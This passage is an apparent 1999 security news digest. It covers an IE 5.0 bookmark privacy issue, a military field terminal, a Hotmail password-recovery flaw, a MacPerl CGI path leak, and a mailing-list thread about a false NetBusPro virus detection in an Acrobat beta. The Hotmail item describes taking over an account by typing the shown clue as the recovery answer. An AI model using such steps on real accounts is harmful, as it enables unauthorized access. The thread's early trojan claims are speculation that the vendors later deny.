05.0 Another privacy hole in MSIE 5.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Another Privacy Hole in IE 5.0?
by Chris Oakes
3:00 a.m. 16.Apr.99.PDT
An obscure feature in Microsoft's Internet Explorer 5.0 Web browser informs Web
sites when users bookmark their pages.
The feature was discovered during an audit of Wired Digital server logs by
software development manager Kevin Cooke and confirmed Thursday by Wired
News.
Microsoft called the privacy implications "unfortunate" and said it is evaluting
changes to future releases of the browser to address the issue.
"This is one of those things where we did not see the privacy issue when we were
creating the feature," said Microsoft product manager Mike Nichols. "The
feature doesn't pose a super-huge risk. But Microsoft is looking at ways of
modifying this feature in future releases."
@HWA
06.0 High tech on the battlefield
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
WITH HIGH TECH AGAINST CYBERWARS
by BHZ, Friday 16th Apr 1999 on 3:15 pm CET
A device known as the End User Terminal, or EUI, a mobile, wireless computer
communication and tracking system, was one of several high-tech systems
demonstrated Wednesday as troops staged a raid on a mock city of cinderblock
buildings at Camp Pendleton, 40 miles north of San Diego. The EUT allows combat
troops to pinpoint the location of friendly and enemy troops in the area. Then they can
relay that information in real time back to commanders, who can then send in air
strikes or reinforcements. Worn like a backpack, the EUT includes an ultra- small
notebook computer, a power amplifier and global positioning system receiver. A
designer for Litton PRC of McClean, Va., said the 12-pound pack costs about $5,500.
Downsides on the system seem to be the fragileness of the system. Spectators
wandered what would happen if the computer took a beating on the battlefield,
became infected with chemical weapon residue or fell into enemy hands -- with
precise data on troop locations. Contributed by Thejian.
@HWA
07.0 Hotmail has similar vulnerabilty to last weeks rocketmail advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
from: http://securityhole.8m.com/
More Webmail Madness; Hotmail vulnerable - 18 April 1999
We released our Rocketmail advisory about a week ago, and decided to do some more
digging. This time we were able to get into an old Hotmail account of ours via the
password lookup function.Once the clue was given, a random string of letters and
numbers, we typed in the clue as the answer. This proved sufficient enough to be
taken to the next level, where we entered a new password. Once again, the mail
which was in the account was missing, probably deleted automatically after x amount
of days, but the original preferences, including name and location of the account
holder were still intact.
We hope Hotmail will try to fix this hole, which was also found in Rocketmail.
We recommend removing password lookup functions on all webmail sites, and deleting
accounts after 4 months of inactivity.
MAO Enterprises ERT
@HWA
08.0 MacPerl CGI vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~
Some MacPerl CGIs Reveal Server Pathnames - 10 April 1999
This is evidently the fault of diagnostic output utilized by some Perl CGIs
served via MacPerl and a webserver. When a CGI with diagnostic output
encounters an error, it prints (displays) the cause of the error in the script
in addition to the pathname of the file. The CGI is usually in the cgi-bin
directory of the webserver, so this is not new. However, it gives the full
path to the script. If the path is Server HD:Web Apps:Serving:Webstar 3.0:
cgi-bin:dumbscript.cgi, then that will be displayed for all to see. This poses
a problem. If a person with devious intent were to rename their own hard drive
as Server HD and create a series of folders with the same names as the folders
on the webserver's drives, and then make an alias of the end result, the alias
can be uploaded to the webserver, and it will be fuctional because the paths are
identical. A compressed alias uncompressed in a publically accessible area or in
a trojan application could be devestating due to the personal and sensetive
information possibly contained within.
We hope CGI developers will keep the paths to themselves from now on, and not
make it public information.
MAO Enterprises ERT
@HWA
09.0 The Adobe Acrobat NetBus scare thread;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date:Tue, 6 Apr 1999 07:41:06 -0600
Reply-To:"Wamsley, James R" <WamslJR@LOUISVILLE.STORTEK.COM>
Sender:Windows NT BugTraq Mailing List <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>
From:"Wamsley, James R" <WamslJR@LOUISVILLE.STORTEK.COM>
Subject:Adobe put Trojan horse in Acrobat.
Comments:To: "firewall-wizards@nfr.com" <firewall-wizards@nfr.com>
Comments:cc: "Samos, Randy B." <samos@anubis.network.com>
We recently found an alarming problem with Adobe's pre-release of Acrobat 4.0,
When one of our users downloaded and installed the pre-release, McAfee, using
data definitions 4.0.4017 stated that one file net bus pro.dr contained a virus
and could not be removed. Of course we investigated and see NetBus there. The
user opened a problem report with Adobe. They acknowledge that NetBus Pro is
part of the package, but 'have not been reported to cause problems with
anyone's computer at this time.'
I personally find this absolutely reprehensible that they would purposely put
'remote administration and spy software' in a package that will be widely
distributed around the world. That is all any of us need is the have a lot of
users install this, and the nefarious users obtain the whole package and start
whacking desktops whenever they choose.
Comments?
[ Jim Wamsley, Network Engineering
[ StorageTek
[ One StorageTek Drive, M.S. 4380, Louisville, CO 80028
[ Audible: (303) 673-8163 Logical jim_wamsley@stortek.com
[ Sed quis custodiet ipsos custodes - Juvenal, C. 100 C.E
----------------------------------------------------------------------------------------
Date:Wed, 7 Apr 1999 15:05:18 -0400
Reply-To:Russ <Russ.Cooper@RC.ON.CA>
Sender:Windows NT BugTraq Mailing List <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>
From:Russ <Russ.Cooper@RC.ON.CA>
Subject:Re: Adobe put Trojan horse in Acrobat.
Comments:To: "Wamsley, James R" <WamslJR@LOUISVILLE.STORTEK.COM>
Interim Update:
James is in a seminar today, and while I was able to drag him out of it long
enough to ask a few questions, some will remain unanswered until tomorrow
(when he can get to the source messages he has).
- They found NetBusPro.dr in a pre-released version of Adobe Acrobat Reader 4.0
- They reportedly got a response from Adobe indicating it had been put there,
and that "nobody has reported it to cause any problems".
When I spoke to Adobe Customer Service, they could not find any reference to
NetBus being included, officially, in any of their Acrobat released products.
Several posters have stated they do not find NetBus when scanning with McAfee
(various versions) against the released Adobe Acrobat 4.0 package (note, I
don't believe this is the same package James was referring to).
I received a message from one poster that included a snippet of a message he
received from a member of the anti-virus research community within which, was a
supposed response from McAfee. McAfee was supposedly acknowledging that this
was a false detection within their 4.0.4017 .DAT file. The response said that
this would be fixed "in a future update of the .DAT files).
I downloaded and checked the McAfee 4.0.4019 .DAT file WhatsNew.txt file, but it
makes no mention of any false detection, or whether or not its been corrected.
James has not scanned it with 4.0.4019 so cannot say if it has, in fact,
disappeared or not.
My apologies for how long this response has taken. James' message caused a
flood of responses and I had hoped to get him to give us some more facts. It
took me a while to track down his pager number (ain't social engineering fun!),
hence the delay.
I have messages into the senior researchers at NAI, but as yet they haven't
responded either. Without accurate info about precisely where James got
precisely what, its hard to ask Adobe many more questions than I already have.
I truly goofed in sending this one out without a little more clarification in
advanced...tsk, tsk...
More when something useful arises.
Cheers, Russ - NTBugtraq moderator
----------------------------------------------------------------------------------------
Date:Thu, 8 Apr 1999 21:33:18 -0400
Reply-To:Russ <Russ.Cooper@RC.ON.CA>
Sender:Windows NT BugTraq Mailing List <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>
From:Russ <Russ.Cooper@RC.ON.CA>
Subject:Re: Adobe put Trojan horse in Acrobat.
Well, I guess neither NAI nor Adobe think enough of us to warrant us with their
direct response, so instead, you get me...;-]
Last night, I spoke with Vincent Gullotto, Manager of AV Researchers at AVERT,
the Supreme Beings of NAI's Anti-Virus crowd. I had sent him a message early
yesterday about the Adobe issue and wanted his confirmation after I had
received a redirected note originating from DataFellows quoting confirmation
from McAfee that the detection of NetBusPro in the pre-release of Adobe Reader
4.0 was, in fact, a mis-detection.
Well, Vincent was nice enough to confirm to me that it was, in fact, a
mis-detection. He agreed that his group would confirm this to NTBugtraq, but he
needed some confirmation from his researchers regarding precisely which versions
of their .DAT files were mis-detecting. "Tomorrow", he said.
I figured that many of you would not accept a simple explanation from Adobe, or a
3rd party confirmation from DataFellows. I spoke to, indirectly, PR people at
Adobe.Seems Adobe is going to publish something on Saturday (gee, thanks for
being so quick Frank). I figured, well, this wasn't going to convince you either.
I stressed to Vincent the need to have NAI confirm the mis-detection. Gee, he
agreed, but here we are and still no confirmation.
Now I've never been one to hide my disdain for the way NAI handles important
issues, but I figured after a person-to-person conversation that I took the
trouble to initiate, and after him telling me point blank that we'd see
something today...sigh...oh well, guess I had higher expectations than I should
have.
So, take my word for it, both NAI and Adobe say the detection of NetBusPro in
the pre-release of Adobe Reader 4.0 was a mis-detection.
That said, Adobe did confirm that there was a file in that version called
NetBusPro.dr. Now ask yourself, who would be stupid enough to call a file in,
even, a pre-release package such a significantly suspicious name as NetBus?
Adobe and NAI both seem suspiciously silent about this fact. Did NAI detect
something and Adobe convinced them to call it a mis-detection? Did Adobe
incorporate NetBusPro into their product and sufficiently hide it, maybe with
NAI cooperation, such that detection programs don't see it anymore?
I have a copy of a message from service@adobe.com which states that
NetBusPro.dr is, in fact, included in the pre-release. That same message
includes links to the NetBus home page, as if to say, "if you want to know
what this thing does, the thing we included in this package, go here and
you'll find out". Another message I have from Adobe internal says that
they've been seeing this rumor for a week now, and on lists where they don't
have dedicated lurkers to dispel such rumors, its run rampant.
If you don't know me, let me tell you. I'm pretty good at getting to the
bottom of things with any company. The fact that Adobe is so unconcerned
about this "rumor" that they're not publishing anything to dispel it until
Saturday stinks of other issues to me. The fact that NAI, despite a personal
confirmation and agreement to publish a statement, still have not, also
stinks of other issues to me.
In the spirit of "better safe than sorry", I'd say this. Stay away from Adobe
Acrobat Reader 4.0 and NAI scanners until this thing has been clarified beyond
a shadow of a doubt (and if you ask me, I don't know how that is now possible).
Draw your own conclusions. DateFellows had a page up about NetBus earlier today,
which I saw, at http://www.europe.datafellows.com/v-descs/netbus.htm, which now
seems to be unavailable. I had personal messages from folks at DataFellows
confirming it was a mis-detection, but they weren't prepared to state this on
the list.
As a responsible White Hat I wanted to get NAI to confirm it was a mis-detection,
and put the whole issue to rest. But as a responsible journalist, I figure the
above is the best you can expect, at least for now.
A fine line, I know, but if you'd been told what I've been told, I suspect you'd
be thinking like me.
Cheers, Russ - NTBugtraq moderator
----------------------------------------------------------------------------------------
Date: Thu, 8 Apr 1999 19:08:42 -0700
From: Sarah Rosenbaum <srosenba@ADOBE.COM>
To: BUGTRAQ@netspace.org
Subject: ALERT: No viruses in Acrobat Reader
The public beta release of Acrobat Reader 4.0, posted on www.adobe.com in
early March was rumored to contain a virus. This is a false report.
McAfee VirusScan 4.x.x for Windows using the 4.0.4017 Virus DAT file
released March 15, 1999 reported that the pre-release version had the
NetBusPro.dr virus, but this was due to an imprecise virus specification
within the 4.0.4017 Virus DAT file itself.
The 4.0.4019 Virus DAT file released by Network Associates on March 29,
1999 corrects the problem and shows that the file is free of viruses.Both
the virus lab at Network Associates and Adobe Systems Inc have confirmed
this fix.
BTW, the 4.0.4015 Virus DAT file that was current as of early March had
also shown the file to be free of viruses.
All pre-release and release versions of Acrobat 4.0 Reader are free of
known viruses.Adobe uses a number of virus scanning utilities, in
addition to McAfee, to thoroughly screen all software before it is released
publicly.Thank you for your attention in this matter.
Sarah
-------------------------------------------------------------------------
Sarah Rosenbaum Adobe Systems Incorporated
Group Product Manager 345 Park Avenue, MS E14
Adobe Acrobat San Jose, CA95110
408-536-3844 (v)srosenba@adobe.com
408-537-4005 (f)www.adobe.com/acrobat
------------------------------------------------------------------------
----------------------------------------------------------------------------------------
Date: Fri, 9 Apr 1999 11:27:16 -0400
From: Russ <Russ.Cooper@RC.ON.CA>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: FW: A post on you NT Bugtrack
Here's the message I received from NAI last night, shortly after my
message went out to the list. Unfortunately it was sent directly to me
rather than to the list itself.
Cheers,
Russ - NTBugtraq moderator
-----Original Message-----
>From: Gullotto, Vincent [mailto:Vincent_Gullotto@NAI.com]
Sent: Thursday, April 08, 1999 10:16 PM
To: 'Russ'
Subject: A post on you NT Bugtrack
As we spoke about yesteday and I did confirm and agree to provide you
and
your readers a response here is a statement from AVERT, A Division of
NAI
Labs.
The topic discussed in the NT BugTrack Subject:"Adobe put Trojan horse
in
Acrobat" was initially brought to our attention on 3/19/99.The
detection
of the NetBusPro tool in the ar40.exe file was incorrect.This occurs
with
the 4017 and 4018 DAT sets for McAfee and Dr Solomon VirusScan 4.XX
products, which were posted on March 17th and March 24th to the AVERT
Labs
web page. The correction was made to the 4019 DAT set which were
posted on
March 29 on NAI's FTP site.
Vincent Gullotto
Manager, AV Research
AVERT-NAI Labs
www.avertlabs.com <http://www.avertlabs.com>
----------------------------------------------------------------------------------------
Date: Fri, 9 Apr 1999 14:19:34 -0400
From: Russ <Russ.Cooper@RC.ON.CA>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: Adobe put Trojan horse in Acrobat.
I've just put an editorial on the Adobe issue up on the NTBugtraq site,
it includes the source information I received that has led me to make
some of the statements I have. Many people asked me to disclose more of
what I had in support of my comments.
Check out the revised News bulletin on the NTBugtraq Home Page,
http://ntbugtraq.ntadvice.com, titled "NetBusPro in Adobe? You decide!".
Cheers,
Russ - NTBugtraq moderator
----------
[http://ntbugtraq.ntadvice.com/default.asp?sid=1&pid=47&aid=28]
What's up with Adobe?
Written by Russ Cooper - 4/9/99 12:42:42 PM
Preface:
Due to over-whelming response, this page is an attempt to disclose what information I have received regarding this issue. While some of the information is verbatim
copy I've received from others, I should make it clear that I have altered some information in order to protect sources. I hope that my reputation as a responsible and
reliable source of accurate information is not tainted by this fact.
In addition, this page also contains speculative observation and editorial commentary. I personally have not been able to investigate the true purpose of any component
within the Adobe Acrobat Reader pre-release 4.0. I do not intend to, I leave that task to others who are more capable in this regard. I would appreciate hearing any
findings, email me at russ.cooper@rc.on.ca.
I hope this allows you to draw your own conclusions. I hope this will also encourage both Adobe and Network Associates, Inc. to better communicate with its user
community over issues as sensitive as this one is.
History:
The alarm raised by Jim Wamsley of StorageTek <http://ntbugtraq.ntadvice.com/default.asp?pid=36&sid=1&A2=ind9904&L=ntbugtraq&F=P&S=&P=779> over the possible presence of NetBusPro within the Adobe Acrobat Reader pre-release 4.0 <ftp://ftp.adobe.com/pub/adobe/acrobatreader/win/4.x/beta/ar40.zip> was, I thought, of import to
NT Security-minded folks everywhere. McAfee's anti-virus definition file (.DAT file) version 4.0.4017 told him that it believed NetBusPro might be included in the
AR40.EXE file (extracted from the downloaded AR40.zip file from Adobe's FTP site) <ftp://ftp.adobe.com/pub/adobe/acrobatreader/win/4.x/beta/ar40.zip>.
James had received this warning from one of his users and, correctly IMO, alerted NTBugtraq.
James' user went to Adobe's Tech Support web site and submitted a question to them. A response was ultimately sent to that user from a generic Adobe Service
account (service@adobe.com). The edited response follows (it has been edited because it contained not only the user name and email address, but also IP address
information of the user. The Adobe "Thread Number", a tracking number they use, has also been omitted. Anyone from Adobe who would like this number is welcome to
contact me for it);
-----Original Message-----
From: service@Adobe.COM [mailto:service@Adobe.COM]
Sent: Friday, April 02, 1999 10:34 AM
To: xxxxxxx@stortek.com
Subject:
Hello xxx,
Thank you for taking the time to alert us of the presence of a possible virus in the Acrobat Reader 4.0 Pre-release download.
Although we have received reports of this virus from a number of different sources, our engineers have not found the presence of an actual virus in the
posted file. NetBus Pro is the name of a software application from another company, and we suspect that the NetBusPro.dr file within the Acrobat Reader
4.0 Pre-release is being mistakenly reported as a virus (although this has not yet been confirmed).
We do know for certain that the Acrobat Reader 4.0 Pre-release (Ar40.exe) has not been reported to cause problems with anyone's computer at this time.
To obtain a version of the Acrobat Reader 4.0 Pre-release that has been verified not to produce any virus messages with McAfee, please download it from
the following ftp site:
ftp://ftp.adobe.com/pub/adobe/acrobatreader/win/4.x/beta/ar40.zip
For more information on NetBus Pro, please visit the following website: http://NetBus.Org/main.html
Also, visit the following URL on the Adobe Web site for the latest customer service and technical information:
http://www.adobe.com/supportservice/custsupport/main.html
Thank you for contacting Adobe Customer Support via the Adobe Web site.
Best regards,
Adobe Customer Support
THREAD:xxxxxxxxxxxxxxxxxxxxx
The thread number (above) is your reference number for this issue. Thank you for visiting www.adobe.com. We hope this reply answers your question.
Inquiries such as yours often prompt us to update or add information to www.adobe.com so it can be available to other customers. Please return to
www.adobe.com for additional information and inquiries. Copyright 1999 Adobe Systems Incorporated
--- On 03/16/99, you wrote ---
WebSite: Adobe.com
ProblemType: Other
WebURL: http://www.adobe.com/
CONTENT_LENGTH = 741
CONTENT_TYPE = application/x-www-form-urlencoded
GATEWAY_INTERFACE = CGI/1.1
HTTPS = OFF
HTTP_ACCEPT = application/vnd.ms-excel, application/msword,application/vnd.ms-powerpoint, image/gif, image/x-xbitmap, image/jpeg,image/pjpeg, */*
HTTP_ACCEPT_ENCODING = gzip, deflate
HTTP_ACCEPT_LANGUAGE = en-us
HTTP_COOKIE = AWID_9.80.22.140:10745:918855192:81;WECCIDCookie932364811728316
HTTP_FORWARDED = by http://xxxxxx.xxxxxxx.xxx:80 (Netscape-Proxy/3.5)
HTTP_HOST = cgi1.adobe.com
HTTP_PRAGMA = no-cache
HTTP_REFERER = http://www.adobe.com/misc/webform.html
HTTP_USER_AGENT = Mozilla/4.0 (compatible; MSIE 5.0b2; Windows NT)
PATH = /usr/sbin:/usr/bin
REMOTE_ADDR = xxx.xxx.xxx.xxx
REMOTE_HOST = xxx.xxx.xxx.xxx
REQUEST_METHOD = POST
SCRIPT_NAME = /misc/comments04.cgi
SERVER_NAME = cgi1.adobe.com
SERVER_PORT = 80
SERVER_PROTOCOL = HTTP/1.0
SERVER_SOFTWARE = Netscape-Commerce/1.12
SERVER_URL = http://cgi1.adobe.com
TZ = US/Pacific
The virus scan program I'm using (McAfee) says there is a virus in the AR40.exe file that is part of the Adobe Acrobat .zip file I just downloaded. VirusScan
says it is a "NetBusPro" virus and can't remove it. My company's team responsible for virus things say it is a new version of NetBus, which is a Trojan
Horse virus. Please contact me about this. --- original message ends ---
Now as you can see, this certainly comes across as Adobe confirming the presence of a file called NetBusPro.dr. I have installed the same version that this person was
referring to and cannot find a file anywhere on my system called NetBusPro.dr, however this does not mean its not present as the Adobe Server Rep. states.
Its also worth pointing out that Adobe does not state, even in their public announcement <http://listserv.netspace.org/cgi-bin/wa?A2=ind9904b&L=bugtraq&F=&S=&P=1246> on the issue posted to Bugtraq, that the program in question does not have
NetBusPro in it, they merely say it is free of viruses. I'm normally a trusting individual, but Adobe's lack of making an unequivocal statement that NetBusPro is not
present would seem to have been the right thing to do.
In the copy of the Adobe Internal Engineering document referencing this supposed false detection, a paragraph is present which is not present in the public Adobe
statement; <http://listserv.netspace.org/cgi-bin/wa?A2=ind9904b&L=bugtraq&F=&S=&P=1246>
"NetBus Pro 2.0 by Carl-Fredrik Neikter is a remote administration and spy tool. It enables you to remotely administer computers. Earlier versions of
NetBus were used illicitly by people who create viruses to play tricks on other people by enabling them to remotely control their computers. These viruses
involving NetBus were known as NETBUS.153 and NETBUS.160. NetBus Pro 2.0 is more robust than earlier versions known as NetBus, and NetBus Pro 2.0
is significantly more difficult to distribute as a virus."
Again, they seem more than willing to give praise to the NetBusPro product and make an attempt to differentiate its characteristic as a "virus" from earlier versions.
Shortly after I sent James' message through to NTBugtraq I sent messages to 4 individuals at Network Associates, Inc.'s AVERT Labs <http://www.avertlabs.com>, including Vincent Gullotto,
Manager of AV Researchers (sent on 4/7/99 1:51pm EDT). Vincent had previously offered these contacts for virus-related issues. My message said;
I released information this morning regarding the supposed inclusion of NetBus in Adobe Acrobat 4.0 based on McAfee 4.0.4017 identifying it being present
in AR40.EXE.
I've subsequently received a message stating that this was a mis-detection by your virus scanner. The poster included text supposedly originating from
McAfee, but I have been unable to find it on your web site. The text was;
-----------------------
This file AR40.EXE for Adobe Acrobat Reader 4.0 is identified by .DAT 4017 as containing "NetBusPro.dr" trojan:
Scanning file D:\!VIRUS\ar40.exe
D:\!VIRUS\ar40.exe could have NetBusPro.dr trojan !!!
This is a false detection. This will be corrected in a future update of the .DAT files. Also thank you for the sample referred to as XXXXXX. It has been
forwarded to our researchers for examination and a researcher will get back to you with our findings. -----------------------
Could you please confirm this, and if possible, provide a link to a publicly accessible statement from McAfee on this? Alternatively, could you have
someone respond directly to NTBugtraq@listserv.ntbugtraq.com re-stating the above.
Your quick reply would be greatly appreciated. I would also greatly appreciate a direct phone number for any of you.
Cheers,
Russ - NTBugtraq moderator
The included quote originated from a respected AV Researcher with DataFellows, and seems to have been sent to a number of people (despite this, I won't disclose the
sources). Virtually the same wording ended up on DataFellows Web Site <http://www.europe.datafellows.com/v-descs/netbus.htm> late yesterday (btw, they have told me it was unavailable when I went to look at it yesterday
simply due to the volume of hits it was receiving).
At ~5:30pm EDT on 4/7/99 I called Vincent directly and spoke with him and one of his researchers about the issue. I stressed that we (NTBugtraq) needed a
confirmation message from NAI to clarify the issue. I asked about NAI's policy regarding mis-detections and was told they do not make the information public. Not that
they don't want to, only that they hadn't yet gotten around to placing the information somewhere on their web sites. Of course I pointed out that it could be included
in their WhatsNew.txt file included in each .DAT file update, and he said he would consider what could be done.
Meanwhile, it was agreed that NAI would post something to the list, as a direct response to my message to the list, that clarified what had happened. Vincent indicated
that he needed to talk to an AV Researcher in the U.K. to determine precisely which .DAT file versions caused a mis-detection. Since it was already after U.K. closing,
NTBugtraq could expect a message the following day (4/8/99). I certainly appreciated his thoroughness, and more than appreciated his cooperation in discussing the
issues with me personally.
Its probably reasonable to point out here that I stressed to Vincent my understanding of how mis-detections happen. I have no expectation that mis-detections will
not occur, of course I hope they will be few and far between like he does, but they're bound to happen. I fully support any AV vendor who's product happens to
mis-detect a virus, better safe than sorry. I pointed out, however, that its just as important to make disclosure of mis-detections. A number of messages I received in
response to the original issue pointed out to me the harm they had been subjected to by people claiming they were being sent infected documents or files...claims made
due to mis-detections. Its one thing for me to tell you that something is a mis-detection, but I would hope you'd only believe it if the AV vendor said so.
After waiting until 9:30 EST on 4/8/99, after closing for the U.S., for a message from NAI clarifying the issue, I felt I should post something <http://ntbugtraq.ntadvice.com/default.asp?pid=36&sid=1&A2=ind9904&L=ntbugtraq&F=P&S=&P=1323>. The volume of messages I
was receiving on the issue indicated that many people felt it was an important issue.
By this time I had spent a great deal of time thinking about the various aspects of this whole affair. Adobe seemed to be pointing people to NetBus, and seemed
unwilling to outright state it was not in their product. NAI had promised a message to the list, but none materialized.
I started to ask myself just how the mis-detection worked, and more importantly, how it could be corrected! Was VirusScan simply detecting the word "NetBusPro"
somewhere in the file? According to my discussions with NAI, the mis-detection came from the reader containing "an icon that was very similar to one found in
NetBusPro" as well as "some header material that was very similar". So did Adobe change an icon in the final release to stop the mis-detection? Or did NAI say to its
.DAT file "if you see something that looks like NetBusPro in Adobe Acrobat Reader 4.0, ignore it, its not NetBusPro!"??
No doubt AV Researchers can better explain why mis-detections happen, and how application vendors can make software that causes mis-detections, but both
parties lackadaisical attitude to the issue just left me feeling like something was missing.
I thought it reasonable that maybe Adobe included NetBusPro in the pre-release of their Reader in order to assist them during the beta testing phase. Might make
sense, and they may have satisfied themselves that NetBusPro was the right product to assist them. Of course there should have been mention of this in the docs
somewhere, and they should have acknowledged it in their announcement to the public. But I wouldn't expect NAI to remove detection of it, regardless of why it might
be there.
Did the NetBusPro folks get on NAI's back and tell them to stop detecting their now commercial version of the product as a Trojan?? If I were the owners of
NetBusPro, and I was trying to sell it commercially, I certainly wouldn't be pleased that AV vendors were telling my users its a Trojan and shouldn't be trusted, would
you?
Or is it all just a simple issue of VirusScan simply being a bit too broad in its signature matching routines and picking up something completely unrelated to NetBusPro
and thinking it was NetBusPro? This is probably the case, but I ask myself, how will I ever know??
I'm not a conspiracy theorist like some of my on-line friends...(Hi Bill...;-])...but clearly there needs to be a more effective mechanism of handling these issues that is
convincing enough to quell any suggestion of suspicious behavior. Unfortunately, I don't have an answer for that right now, hence my skepticism.
Hopefully one of you with the ability to decompile and analyze code will be able to tell us, for certain, whether or not there is any NetBusPro functionality in the Adobe
Acrobat Reader pre-release 4.0. Hopefully Adobe will make an unequivocal statement that there is not such functionality in any version of their product. Hopefully NAI,
and all AV vendors, will start making lists of mis-detections available to the public as and when they happen.
Hopefully I haven't over-hyped this issue, and instead, have helped somewhat to make such issues less worrisome in the future. That was my intent.
Cheers,
Russ - NTBugtraq moderator
comments welcome...
----------------------------------------------------------------------------------------
Date: Mon, 12 Apr 1999 08:04:20 -0400
From: Russ <Russ.Cooper@RC.ON.CA>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: FW: ALERT: No viruses in Acrobat Reader
[ The following text is in the "iso-8859-1" character set. ]
[ Your display is set for the "US-ASCII" character set.]
[ Some characters may be displayed incorrectly. ]
Received: from smtp-relay-1.adobe.com ([192.150.11.1]) by
ns.ntbugtraq.com with SMTP (Microsoft Exchange Internet Mail Service
Version 5.5.1960.3)
| id H1GPKN43; Sun, 11 Apr 1999 23:02:50 -0400
Received: from inner-relay-1.Adobe.COM ([153.32.1.51] (may be forged))
| by smtp-relay-1.Adobe.COM (8.8.6) with ESMTP id TAA23125
| for < Russ.Cooper@rc.on.ca>; Sun, 11 Apr 1999 19:57:16 -0700 (PDT)
Received: from mail-321.corp.Adobe.COM|by inner-relay-1.Adobe.COM
(8.8.5) with ESMTP id UAA15768; Sun, 11 Apr 1999 20:02:44 -0700 (PDT)
Received: from sarahtp600|by mail-321.corp.Adobe.COM (8.7.5) with SMTP
id UAA08101; Sun, 11 Apr 1999 20:02:41 -0700 (PDT)
Message-Id: < 4.1.19990411190139.00afeda0@mail-321.corp.adobe.com>
X-Sender: srosenba@mail-321.corp.adobe.com
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1
Date: Sun, 11 Apr 1999 19:55:55 -0700
To: Russ < Russ.Cooper@rc.on.ca>
>From: Sarah Rosenbaum < srosenba@Adobe.COM>
Subject: RE: ALERT: No viruses in Acrobat Reader
In-Reply-To: < 61143C10CC8AD211A2F10000F878E683066F9C@ns.rc.on.ca>
Mime-Version: 1.0
-----Original Message-----
>From: Sarah Rosenbaum [mailto:srosenba@Adobe.COM]
Sent: Sunday, April 11, 1999 10:56 PM
To: Russ
Subject: RE: ALERT: No viruses in Acrobat Reader
Dear Mr. Cooper,
Below is an additional statement regarding the false reports that the
Adobe Acrobat Reader pre-relese contained a "virus," or more
specifically, the NetBusPro software. Although we believe the original
statements from Adobe Systems Incorporated and Network Associates, Inc.
last Thursday (April 8) clearly refuted the false report, your
commentary on this issue on www.ntbugtraq.com suggests that you did not
find such statements unequivocal.
We appreciate the service your web site provides to the software
industry. However, given the rapidity with which false informaiton can
spread over the internet, we would appreciate that great care be taken
to verify information that can so seiruosly harm a developer of top
quality software. As you know, Adobe products are highly regarded. False
reports such as these are damaging and also require a use of Adobe's
resources which are better spent contributing to innovation.
Thank you for posting the information below to your web site. For
further information, please don't hestitate to contact me.
Regards,
Sarah
------------------------------------------------------------------------
-
Sarah Rosenbaum | | | | | | |Adobe Systems Incorporated
Group Product Manager| || | | | | | |345 Park Avenue, MS E14
Adobe Acrobat| || | | | | | || | | | | | |San Jose, CA|95110
408-536-3844 (v)| | | | | | || | | | | | || | | | | | |srosenba@adobe.com
408-537-4005 (f)| | | | | | || | | | | | || | | | | | |www.adobe.com/acrobat
------------------------------------------------------------------------
Subject: NO NetBusPro IN ADOBE ACROBAT READER
Adobe software, such as Acrobat Reader, does not include, nor did it
ever include, any NetBus or NetBusPro software.
McAfee VirusScan 4.x falsely reported the NetBusPro.dr software when
scanning Ar40.exe and Ar40eng.exe pre-release software when using virus
definitions 4.0.4017. The virus alert was caused by an error in version
4.0.4017 of the virus definition file distributed Network Associates,
Inc. This has been confirmed by the virus lab at Network Associates,
Inc. and by Adobe Systems Incorporated.When you install virus
definitions 4.0.4019, VirusScan 4.x does not report an eror with
Ar40.exe or Ar40eng.exe.
Adobe uses a variety of anti-virus software in addition to McAfee
VirusScan to thoroughly screen all software before it is publicly
released.
There was some confusion from original reports because NetBusPro is
described as both a virus and a "trojan horse". It is a common confusion
because software such as NetBusPro is sometimes picked up by virus
detection software.
Regards,
Sarah Rosenbaum
------------------------------------------------------------------------
-
Sarah Rosenbaum | | | | | | |Adobe Systems Incorporated
Group Product Manager| || | | | | | |345 Park Avenue, MS E14
Adobe Acrobat| || | | | | | || | | | | | |San Jose, CA|95110
408-536-3844 (v)| | | | | | || | | | | | || | | | | | |srosenba@adobe.com
408-537-4005 (f)| | | | | | || | | | | | || | | | | | |www.adobe.com/acrobat
------------------------------------------------------------------------
At 01:28 PM 4/10/99 -0400, you wrote:
>Could you get Adobe to confirm, publicly, that Adobe Acrobat Reader
4.0,
>any version be it beta or otherwise, never has, and does not, contain
>components, or the complete version, of NetBusPro 2.x?
>
>NetBus v1.xx is considered a "virus", or a Trojan actually, but the
>commercial product NetBusPro 2.x is not considered as such.
>
>Adobe's public statement, sent in your name, does not make this
>distinction sufficiently for many of my 24,000+ subscribers (or me).
>
>Such a clarification, in public, either on your web site or via email,
>would put this matter to rest once and for all.
>
>Cheers,
>Russ - NTBugtraq moderator
>List address: NTBugtraq@listserv.ntbugtraq.com
>Web site: http://ntbugtraq.ntadvice.com
>
-------------------------------------------------------------------------------
Adobe Conclusion - Part 1
Written by Russ Cooper - 4/13/99 5:38:47 PM
I spoke with a wonderful PR fella at Adobe named Tim Oey this afternoon. I've been travelling since Sunday morning so this is why you haven't seen much from me
lately. Anyway, so Tim's all anxious for me to get a change up on my web site regarding the latest breaking news from them (meaning I should change my site to
reflect information Sarah sent me in private on Sunday which I published yesterday). I got a chuckle out of the fact he figured I should've changed my site overnight
when its taken them more than 2 weeks to get something up on theirs...but that's another story.
To the heart of the matter;
In my editorial, http://ntbugtraq.ntadvice.com/default.asp?sid=1&pid=47&aid=28 (which I will be referring to as "my Adobe editorial" from now on), I said;
"Its also worth pointing out that Adobe does not state, even in their public announcement on the issue posted to Bugtraq, that the program in question
does not have NetBusPro in it, they merely say it is free of viruses. I'm normally a trusting individual, but Adobe's lack of making an unequivocal
statement that NetBusPro is not present would seem to have been the right thing to do."
to wit, Tim sent me this URL today;
